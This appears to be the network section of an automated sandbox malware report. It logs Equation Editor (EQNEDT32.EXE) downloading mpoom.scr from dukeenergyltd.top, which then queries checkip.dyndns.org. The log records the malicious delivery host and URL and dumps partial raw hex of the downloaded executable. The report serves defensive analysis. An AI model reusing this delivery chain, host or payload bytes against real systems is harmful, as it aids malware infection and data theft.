                                  Apr 23, 2024 07:49:57.740519047 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.740581036 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.740659952 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.740704060 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.740823030 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.740880966 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.740942001 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.740993977 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.741529942 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.741595030 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.741736889 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.741800070 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.742397070 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.742475986 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.742656946 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.742726088 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.743184090 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.743249893 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.743388891 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.743449926 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.743686914 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.743757010 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.744041920 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.744148970 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.744307041 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.744371891 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.744679928 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.744740009 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.745429039 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.745448112 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.745501995 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.836749077 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.836942911 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.837934017 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.838012934 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.838085890 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.838141918 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.838541031 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.838615894 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.840291023 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.840365887 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.840471029 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.840533972 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.840627909 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.840677977 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.841244936 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.841319084 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.841336966 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.841384888 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.842679024 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.842753887 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.842772007 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.842823982 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.843786955 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.843854904 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.843877077 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.843919992 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.844084024 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.844151020 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.844608068 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.844679117 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.845371962 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.845484972 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.845901012 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.845972061 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.846826077 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.846882105 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.846893072 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.846899033 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.846927881 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.846935987 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.847085953 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.847145081 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.848206043 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.848267078 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.848269939 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.848304033 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.848323107 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.848342896 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.849652052 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.849901915 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.849910021 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:59.613476038 CEST4916280192.168.2.22193.122.6.168
                                  Apr 23, 2024 07:49:59.786726952 CEST8049162193.122.6.168192.168.2.22
                                  Apr 23, 2024 07:49:59.786804914 CEST4916280192.168.2.22193.122.6.168
                                  Apr 23, 2024 07:49:59.788209915 CEST4916280192.168.2.22193.122.6.168
                                  Apr 23, 2024 07:49:59.961425066 CEST8049162193.122.6.168192.168.2.22
                                  Apr 23, 2024 07:50:00.892457008 CEST8049162193.122.6.168192.168.2.22
                                  Apr 23, 2024 07:50:01.187113047 CEST4916280192.168.2.22193.122.6.168
                                  Apr 23, 2024 07:51:05.884891987 CEST8049162193.122.6.168192.168.2.22
                                  Apr 23, 2024 07:51:05.885220051 CEST4916280192.168.2.22193.122.6.168
                                  Apr 23, 2024 07:51:40.935224056 CEST4916280192.168.2.22193.122.6.168
                                  Apr 23, 2024 07:51:41.108491898 CEST8049162193.122.6.168192.168.2.22
                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 23, 2024 07:49:56.673778057 CEST5456253192.168.2.228.8.8.8
                                  Apr 23, 2024 07:49:56.782021999 CEST53545628.8.8.8192.168.2.22
                                  Apr 23, 2024 07:49:59.261459112 CEST5291753192.168.2.228.8.8.8
                                  Apr 23, 2024 07:49:59.352401972 CEST53529178.8.8.8192.168.2.22
                                  Apr 23, 2024 07:49:59.507497072 CEST6275153192.168.2.228.8.8.8
                                  Apr 23, 2024 07:49:59.595150948 CEST53627518.8.8.8192.168.2.22
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Apr 23, 2024 07:49:56.673778057 CEST192.168.2.228.8.8.80xe3cdStandard query (0)dukeenergyltd.topA (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.261459112 CEST192.168.2.228.8.8.80xade5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.507497072 CEST192.168.2.228.8.8.80x4465Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Apr 23, 2024 07:49:56.782021999 CEST8.8.8.8192.168.2.220xe3cdNo error (0)dukeenergyltd.top172.67.134.136A (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:56.782021999 CEST8.8.8.8192.168.2.220xe3cdNo error (0)dukeenergyltd.top104.21.25.202A (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.352401972 CEST8.8.8.8192.168.2.220xade5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.352401972 CEST8.8.8.8192.168.2.220xade5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.352401972 CEST8.8.8.8192.168.2.220xade5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.352401972 CEST8.8.8.8192.168.2.220xade5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.352401972 CEST8.8.8.8192.168.2.220xade5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.352401972 CEST8.8.8.8192.168.2.220xade5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.595150948 CEST8.8.8.8192.168.2.220x4465No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.595150948 CEST8.8.8.8192.168.2.220x4465No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.595150948 CEST8.8.8.8192.168.2.220x4465No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.595150948 CEST8.8.8.8192.168.2.220x4465No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.595150948 CEST8.8.8.8192.168.2.220x4465No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                  Apr 23, 2024 07:49:59.595150948 CEST8.8.8.8192.168.2.220x4465No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                  • dukeenergyltd.top
                                  • checkip.dyndns.org
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.2249162193.122.6.168803248C:\Users\user\AppData\Roaming\mpoom39002.scr
                                  TimestampBytes transferredDirectionData
                                  Apr 23, 2024 07:49:59.788209915 CEST151OUTGET / HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                  Host: checkip.dyndns.org
                                  Connection: Keep-Alive
                                  Apr 23, 2024 07:50:00.892457008 CEST323INHTTP/1.1 200 OK
                                  Date: Tue, 23 Apr 2024 05:50:00 GMT
                                  Content-Type: text/html
                                  Content-Length: 106
                                  Connection: keep-alive
                                  Cache-Control: no-cache
                                  Pragma: no-cache
                                  X-Request-ID: ac5b01eef868e899a11d120acb7331cf
                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 31 36 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.163</body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.2249161172.67.134.1364432160C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  TimestampBytes transferredDirectionData
                                  2024-04-23 05:49:57 UTC313OUTGET /mpoom.scr HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: dukeenergyltd.top
                                  Connection: Keep-Alive
                                  2024-04-23 05:49:57 UTC775INHTTP/1.1 200 OK
                                  Date: Tue, 23 Apr 2024 05:49:57 GMT
                                  Content-Type: application/x-silverlight
                                  Content-Length: 331264
                                  Connection: close
                                  Last-Modified: Tue, 23 Apr 2024 00:00:26 GMT
                                  ETag: "50e00-616b83dbfcf20"
                                  Accept-Ranges: bytes
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aPZro9ctiIG9vVItEJYNoqQHzbMp6h0XiKmbLYZRQu%2FKT8lXM078E%2BVBFB2OP6HMQQkDNDCgdGFg%2Bea8UO1DH6ipt1r1PlSQE7irX3ib8MTP78djA885YmiOZqcyRwm%2FQnWHrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                  X-Content-Type-Options: nosniff
                                  Server: cloudflare
                                  CF-RAY: 878b92c05af278d9-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  2024-04-23 05:49:57 UTC594INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 de 0d 14 9f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 02 05 00 00 0a 00 00 00 00 00 00 fe 20 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0 @@ @
                                  2024-04-23 05:49:57 UTC1369INData Raw: 28 14 00 00 0a 00 00 02 72 01 00 00 70 73 15 00 00 0a 7d 01 00 00 04 02 73 16 00 00 0a 7d 02 00 00 04 2a 72 00 02 7b 02 00 00 04 17 6f 17 00 00 0a 00 02 7b 02 00 00 04 03 6f 18 00 00 0a 00 2a 56 00 02 7b 02 00 00 04 6f 20 00 00 0a 03 04 6f 21 00 00 0a 26 2a 22 02 28 14 00 00 0a 00 2a b2 28 23 00 00 06 80 04 00 00 04 28 26 00 00 0a 7e 04 00 00 04 28 0c 00 00 06 6f 27 00 00 0a 6f 28 00 00 0a 1f 23 9a 80 05 00 00 04 2a 4a 00 7e 05 00 00 04 74 29 00 00 01 28 29 00 00 0a 26 2a 26 02 28 14 00 00 0a 00 00 2a 22 00 02 80 07 00 00 04 2a 13 30 01 00 0c 00 00 00 01 00 00 11 00 02 7b 03 00 00 04 0a 2b 00 06 2a 1b 30 02 00 39 00 00 00 02 00 00 11 00 02 7b 02 00 00 04 02 7b 01 00 00 04 6f 19 00 00 0a 00 00 02 7b 01 00 00 04 6f 1a 00 00 0a 00 02 02 7b 02 00 00 04 6f 1b
                                  Data Ascii: (rps}s}*r{o{o*V{o o!&*"(*(#(&~(o'o(#*J~t)()&*&(*"*0{+*09{{o{o{o
                                  2024-04-23 05:49:57 UTC1369INData Raw: 00 06 72 36 04 00 70 03 6f 08 00 00 06 00 06 72 c8 04 00 70 03 6f 08 00 00 06 00 06 6f 05 00 00 06 00 00 de 04 0b 00 07 7a de 0a 00 06 6f 09 00 00 06 00 00 dc 2a 00 00 00 01 1c 00 00 00 00 07 00 31 38 00 04 1e 00 00 01 02 00 07 00 37 3e 00 0a 00 00 00 00 1b 30 03 00 41 00 00 00 06 00 00 11 00 73 02 00 00 06 0a 00 06 72 d0 04 00 70 6f 03 00 00 06 00 06 72 24 03 00 70 03 8c 26 00 00 01 6f 08 00 00 06 00 06 6f 05 00 00 06 00 00 de 04 0b 00 07 7a de 0a 00 06 6f 09 00 00 06 00 00 dc 2a 00 00 00 01 1c 00 00 00 00 07 00 29 30 00 04 1e 00 00 01 02 00 07 00 2f 36 00 0a 00 00 00 00 1b 30 02 00 42 00 00 00 08 00 00 11 00 73 02 00 00 06 0a 00 06 72 1c 05 00 70 6f 03 00 00 06 00 06 6f 04 00 00 06 00 2b 02 00 00 06 6f 01 00 00 06 6f 25 00 00 0a 0b 07 2d ef 00 de 04 0c
                                  Data Ascii: r6porpoozo*187>0Asrpor$p&oozo*)0/60Bsrpoo+oo%-
                                  2024-04-23 05:49:57 UTC1369INData Raw: 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76
                                  Data Ascii: oxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXv
                                  2024-04-23 05:49:57 UTC1369INData Raw: 44 6f 78 b4 b7 72 ca 45 4d 46 45 6f 37 4a 1e 76 39 45 04 46 1a 6f 36 4a 17 76 3e 45 1e 46 17 6f 3d 4a 0e 76 28 45 1e 46 13 6f 78 4a 6c 75 f7 45 4d 46 45 6f 78 4a 58 76 77 46 cd 46 40 6f 20 4a 58 76 3f 45 4d 46 45 6f 79 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 c5 4d 46 75 6f 78 4a 59 76 76 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 ef 78 4a 40 76 77 45 5d 46 44 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58 76 77 45 4d 46 45 6f 78 4a 58
                                  Data Ascii: DoxrEMFEo7Jv9EFo6Jv>EFo=Jv(EFoxJluEMFEoxJXvwFF@o JXv?EMFEoyJXvwEMFEoxJXvwMFuoxJYvvEMFEoxJXvwEMFExJ@vwE]FDoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJXvwEMFEoxJX
                                  2024-04-23 05:49:57 UTC1369INData Raw: 4c 79 ee 6a 4b 71 64 62 42 4f 44 47 6d 7a 4f 5f 71 4b c4 5f 47 11 ee 6a 5f 59 b7 f7 57 58 47 4f 60 44 cb 4a 77 23 c4 5f 53 44 ae f8 58 4d 4a f6 57 4c 12 c4 7d 6d 4b 99 f6 65 50 71 c7 57 6e 2c cb 4a 63 76 84 cd 54 50 6c 7f 63 c5 f5 66 d8 ce 57 e4 ed 6a 4b 5b 56 7b d8 ce 57 d8 ed 6a 9f d8 64 79 44 49 66 48 f2 fb 5b c5 f5 66 e4 cf 54 dc ed 6a 97 d8 67 8a c4 5c 1f 54 d6 f8 58 50 71 6e e4 cf 54 1c 7e d9 c8 4a ef f5 57 f4 c6 57 6a 7f 5a f9 f4 65 1c 5c e7 c7 7d c1 ca 4a 72 70 48 14 57 e4 ed 6a 93 da 64 2e 54 d4 c4 57 ce fa 58 f9 f4 65 1c 5c df c7 7d e1 c8 4a 7e d2 c5 5c e3 c5 7e dd ca 49 2f 66 fc cd 54 55 68 54 13 49 ef f5 57 4f 1f 54 f6 fa 58 e1 f6 65 43 4a 56 47 67 7a 48 50 74 75 47 45 44 47 67 7a 48 5a 74 2e 54 45 4e 24 7e 6c 4d 40 1b f5 54 20 c4 54 6d 7f 42
                                  Data Ascii: LyjKqdbBODGmzO_qK_Gj_YWXGO`DJw#_SDXMJWL}mKePqWn,JcvTPlcfWjK[V{WjdyDIfH[fTjg\TXPqnT~JWWjZe\}JrpHWjd.TWXe\}J~\~I/fTUhTIWOTXeCJVGgzHPtuGEDGgzHZt.TEN$~lM@T TmB
                                  2024-04-23 05:49:57 UTC1369INData Raw: 5c 4e 4d 64 7f 52 45 f7 66 24 5c 8b c5 7d 79 49 78 7d 46 57 4f 44 1c 7e 7a 2b 49 70 70 4e 98 c4 57 6f 58 4f 09 f7 65 74 5f 44 74 7d ad c8 4a 73 70 48 5c c5 57 6e 79 6a 5e 7b f4 57 4c 47 65 69 88 ca 4a 77 6e c4 5f 53 4d 72 f9 5b 59 71 72 98 cd 57 44 68 7d ba d8 64 76 42 48 b6 c5 7d 79 53 d9 64 62 44 4a 4c 2c 7d 79 4b 78 73 6b 4b 4c 46 41 67 64 4b 78 72 72 c6 5c 46 65 6a a1 c8 4a 2f 66 4d d4 c4 57 61 7a d3 da 64 75 e0 cd 57 e0 ef 69 13 49 cf f7 57 41 41 59 4a 6a f3 d8 64 76 45 4a 9f c7 7d 70 d3 da 64 2e 54 ec c4 57 f6 fa 58 5a ab f7 54 43 e3 c5 7e dd ca 49 d3 f7 54 14 57 fc ef 6a 13 49 74 67 42 6a 1f 54 b6 fa 58 c1 f4 65 1c 5c df c7 7d 7a 13 49 d7 f5 57 d4 c4 57 6d 7a 48 5a ab f7 54 e8 c6 54 ca f8 5b fd f6 66 4d 14 57 fc ef 6a 5e 5f 58 76 c4 5c 47 42 6a 85
                                  Data Ascii: \NMdREf$\}yIx}FWOD~z+IppNWoXOet_Dt}JspH\Wnyj^{WLGeiJwn_SMr[YqrWDh}dvBH}ySdbDJL,}yKxskKLFAgdKxrr\FejJ/fMWazduWiIWAAYJjdvEJ}pd.TWXZTC~ITWjItgBjTXe\}zIWWmzHZTT[fMWj^_Xv\GBj
                                  2024-04-23 05:49:57 UTC1369INData Raw: 55 14 57 ac ed 69 4b 58 71 92 c7 5c 47 44 4f 7e ab da 67 76 44 6d 40 98 ed 69 4b 59 56 71 4d 45 63 57 6e 7b 6a 5f 74 2e 54 14 57 dc ed 6a 48 f9 f4 65 47 d4 c4 57 6d 7a 13 49 7e d2 c5 5c 9f c7 7d 70 ef d8 67 75 47 14 57 56 68 5d d3 da 64 2e 54 14 57 dc ed 6a 13 49 d3 f7 54 4f 44 47 cf f8 58 f8 f6 65 c5 cd 54 47 fe fa 5b 4d ef f5 57 4f df c7 7d c1 ca 4a 79 70 69 cd c6 57 ef f8 58 59 2f f5 54 58 44 42 62 f8 ca 4a f6 f7 57 4c 1f c7 7e 6d 48 5a 72 70 4a 4f 44 c5 ef 6a 7b 4a 72 70 4c ed c6 57 cf f8 58 d8 f6 65 47 dc c4 54 7a 7a 4d 48 74 75 47 14 57 47 36 69 4c 5f 7c 75 47 4f 1f 54 6d 21 5b f8 f6 65 e5 cd 54 c5 ef 6a 48 c9 f4 66 50 14 57 47 65 7f 51 f8 f6 65 c5 cd 54 47 fe fa 5b 4d 7d d7 c5 5f c6 c5 7d 7a c7 da 64 62 4e ed c6 57 6e 51 58 4d 71 75 45 53 44 f8 ef
                                  Data Ascii: UWiKXq\GDO~gvDm@iKYVqMEcWn{j_t.TWjHeGWmzI~\}pguGWVh]d.TWjITODGXeTG[MWO}JypiWXY/TXDBbJWL~mHZrpJODj{JrpLWXeGTzzMHtuGWG6iL_|uGOTm![eTjHfPWGeQeTG[M}_}zdbNWnQXMquESD
                                  2024-04-23 05:49:57 UTC1369INData Raw: 75 47 4f 44 88 ef 6a 45 5f 63 cb c5 5f c2 c5 7d 7a db da 67 62 4e f1 c6 57 eb f8 58 5a fb f5 57 58 4d 24 7e 7a 4b 78 73 cf c5 5f d2 c5 7d 7a db da 67 62 4e f5 c6 57 fb f8 58 5a fb f5 57 58 4d 24 7e 78 4a 5c 74 75 47 4f 44 47 6d 7a 48 5a 74 75 47 4f 44 47 6d 7a 48 e4 f6 65 f9 cd 54 c1 ef 6a 48 c9 f4 66 50 14 57 47 d7 f8 58 e0 f6 65 d1 cd 54 47 fe fa 5b 4d 17 66 5f 4a 70 94 ef 6a 4b 59 76 71 94 cd 54 45 6f 7d 4b 4b 76 64 44 4f 66 42 eb f8 58 59 2f f5 54 58 4e c1 ef 6a 4b 71 64 62 42 4c 55 45 4f 7c de d8 64 0b 54 4f d7 c7 7e 6d 40 59 65 77 56 4f d7 c7 7e 6d 4a 78 7d e3 c5 5f 3a 54 6d f5 c8 4a 63 7d 44 5e 46 56 6d f5 c8 4a 63 77 65 46 d2 c5 7d 04 5b 5a 23 65 50 44 fe c5 7d c4 ca 4a f2 f7 57 c9 c6 57 6e 21 c8 49 63 75 47 d9 c6 57 fb f8 58 24 67 75 d4 cf 57 50
                                  Data Ascii: uGODjE_c_}zgbNWXZWXM$~zKxs_}zgbNWXZWXM$~xJ\tuGODGmzHZtuGODGmzHeTjHfPWGXeTG[Mf_JpjKYvqTEo}KKvdDOfBXY/TXNjKqdbBLUEO|dTO~m@YewVO~mJx}_:TmJc}D^FVmJcweF}[Z#ePD}JWWn!IcuGWX$guWP
